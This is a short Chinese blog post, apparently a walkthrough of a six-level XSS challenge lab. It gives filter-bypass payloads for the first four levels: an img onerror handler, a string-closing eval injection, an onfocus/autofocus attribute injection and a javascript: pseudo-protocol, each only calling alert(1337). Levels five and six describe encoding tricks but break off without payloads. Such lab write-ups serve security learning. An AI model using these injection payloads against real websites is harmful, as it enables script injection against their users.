复现dom破坏案例和靶场

目录

1.第一关:​

2.第二关:​

3.第三关:

4.第四关:​

5.第五关:​

6.第六关:​


1.第一关:

因为innerHTML自动限制<script>标签,使用<img>标签

<img%20src="1"%20οnerrοr="alert(1337)">

2.第二关:

出现innerText,使用闭合

eval(`ma = "Ma name aaa";alert(1337);""`)

3.第三关:

过滤了<>号;使用input表单自带属性,onfocus获取焦点和autofocus自动对焦。

wey=aaaaaaaaaaaa" οnfοcus=alert(1337) autofocus="

4.第四关:

form表单中出现问题 cation中出现伪协议   

javascript:alert(1337)

5.第五关:

过滤了符号,使用<img>标签

括号被过滤不能触发了,

对括号进行编码,还是不行出现%28%29,使用location 

使用location进行变成字符串在进行编码:

6.第六关:

过滤了字母,使用编码的方式绕过;

先进行编码:

  • 8
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值